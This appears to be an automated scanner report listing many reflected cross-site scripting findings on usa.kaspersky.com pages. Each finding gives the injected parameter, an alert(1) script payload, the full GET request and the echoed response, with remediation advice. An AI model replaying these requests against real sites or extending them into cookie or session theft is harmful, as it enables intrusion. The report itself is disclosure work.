GET /node/index.htmle9fcf"><script>alert(1)</script>ee3eca5136f HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/node/index.htmle9fcf"><script>alert(1)</script>ee3eca5136f" /> ...[SNIP]...
1.99. http://usa.kaspersky.com/node/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/node/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74a6a"-alert(1)-"474c2192743 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /node/index.html?74a6a"-alert(1)-"474c2192743=1 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.100. http://usa.kaspersky.com/node/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/node/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebdb9"><script>alert(1)</script>512ff95029d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /node/index.html?ebdb9"><script>alert(1)</script>512ff95029d=1 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1927f"><script>alert(1)</script>4da6a2e3d63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products-services1927f"><script>alert(1)</script>4da6a2e3d63/home-computer-security/index.html HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e87a"-alert(1)-"63b94f304e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products-services4e87a"-alert(1)-"63b94f304e1/home-computer-security/index.html HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 482c7"><script>alert(1)</script>ca326f1366e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products-services/home-computer-security482c7"><script>alert(1)</script>ca326f1366e/index.html HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42846"-alert(1)-"1737ec5e156 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products-services/home-computer-security42846"-alert(1)-"1737ec5e156/index.html HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28525"><script>alert(1)</script>9ade6974e30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products-services/home-computer-security/index.html28525"><script>alert(1)</script>9ade6974e30 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62dbd"-alert(1)-"91cf1275c68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products-services/home-computer-security/index.html62dbd"-alert(1)-"91cf1275c68 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 784c6"><script>alert(1)</script>ea35560650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products-services/home-computer-security/index.html?784c6"><script>alert(1)</script>ea35560650=1 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50061"-alert(1)-"b1568a13e65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products-services/home-computer-security/index.html?50061"-alert(1)-"b1568a13e65=1 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ed40"><script>alert(1)</script>c411af10f77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc970"-alert(1)-"d7b46699d0c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7a80"><script>alert(1)</script>c1160999181 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75ac9"-alert(1)-"44655643b9d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60faf"-alert(1)-"aea51866174 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75d19"><script>alert(1)</script>e6a94cf142d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/internet-security75d19"><script>alert(1)</script>e6a94cf142d" /> ...[SNIP]...
1.115. http://usa.kaspersky.com/products-services/home-computer-security/internet-security [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d3d5"><script>alert(1)</script>0c315f9bb81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee59a"-alert(1)-"e444da54003 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7232c"><script>alert(1)</script>8b2c2136941 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cd88"-alert(1)-"318679f3559 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6afa"><script>alert(1)</script>dc1a0daf0d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c305"-alert(1)-"ab57f4ebc3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48453"><script>alert(1)</script>f916dd51d3f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/mobile-security48453"><script>alert(1)</script>f916dd51d3f" /> ...[SNIP]...
1.122. http://usa.kaspersky.com/products-services/home-computer-security/mobile-security [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c748"><script>alert(1)</script>97e9ae62b7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ICID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45594"><script>alert(1)</script>43356559f66 was submitted in the ICID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb7f5"-alert(1)-"314b0280887 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a252"><script>alert(1)</script>7809b8460a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a91a9"-alert(1)-"929e765b02d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fedd"><script>alert(1)</script>9235e22f1fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4455"><script>alert(1)</script>c974b3a38d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3516d"-alert(1)-"539626fa5f8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.130. http://usa.kaspersky.com/products-services/home-computer-security/pure [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/products-services/home-computer-security/pure
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b09c3"><script>alert(1)</script>346be129cf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79397"><script>alert(1)</script>d1dc6a9e10c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d244"-alert(1)-"79edbca8ad5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e07ce"><script>alert(1)</script>42a4c5f2575 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f780"-alert(1)-"e86bf53504a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0c99"-alert(1)-"685c02abd53 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b25dc"><script>alert(1)</script>d322e4cce32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/tablet-securityb25dc"><script>alert(1)</script>d322e4cce32" /> ...[SNIP]...
1.137. http://usa.kaspersky.com/products-services/home-computer-security/tablet-security [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f909e"><script>alert(1)</script>6f2d209b2fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2ff9"><script>alert(1)</script>485f603b1ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/knowledge-centerf2ff9"><script>alert(1)</script>485f603b1ae/index.html HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3acc"-alert(1)-"75ba5310b70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /resources/knowledge-centera3acc"-alert(1)-"75ba5310b70/index.html HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56241"><script>alert(1)</script>8fdcf2dfe51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/knowledge-center/index.html56241"><script>alert(1)</script>8fdcf2dfe51 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e8f2"-alert(1)-"38af26a7928 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /resources/knowledge-center/index.html5e8f2"-alert(1)-"38af26a7928 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.142. http://usa.kaspersky.com/resources/knowledge-center/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/resources/knowledge-center/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31f13"-alert(1)-"3296f683bfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /resources/knowledge-center/index.html?31f13"-alert(1)-"3296f683bfa=1 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.143. http://usa.kaspersky.com/resources/knowledge-center/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/resources/knowledge-center/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a644"><script>alert(1)</script>0a50e7eee8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/knowledge-center/index.html?6a644"><script>alert(1)</script>0a50e7eee8=1 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83184"><script>alert(1)</script>569acb540ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efae4"-alert(1)-"adf5365208a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9159e"-alert(1)-"b59df5b2090 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b395c"><script>alert(1)</script>3905b3800ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40126"><script>alert(1)</script>4d4c1686dd3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e91be"-alert(1)-"12aebe11698 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.150. http://usa.kaspersky.com/resources/knowledge-center/whitepapers [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/resources/knowledge-center/whitepapers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e3d7"><script>alert(1)</script>93ae9a92e57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e153"-alert(1)-"fb85deb5a47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search7e153"-alert(1)-"fb85deb5a47/apachesolr_search HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a126"><script>alert(1)</script>dc901a9507b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search6a126"><script>alert(1)</script>dc901a9507b/apachesolr_search HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd98d"><script>alert(1)</script>012d6f3a9b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/apachesolr_searchcd98d"><script>alert(1)</script>012d6f3a9b7 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_searchcd98d"><script>alert(1)</script>012d6f3a9b7" /> ...[SNIP]...
1.154. http://usa.kaspersky.com/search/apachesolr_search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/search/apachesolr_search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3361b"><script>alert(1)</script>28ebda2c90f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/apachesolr_search?3361b"><script>alert(1)</script>28ebda2c90f=1 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95090"-alert(1)-"6ca4c5faa38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40f83"><script>alert(1)</script>b60263f7e0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
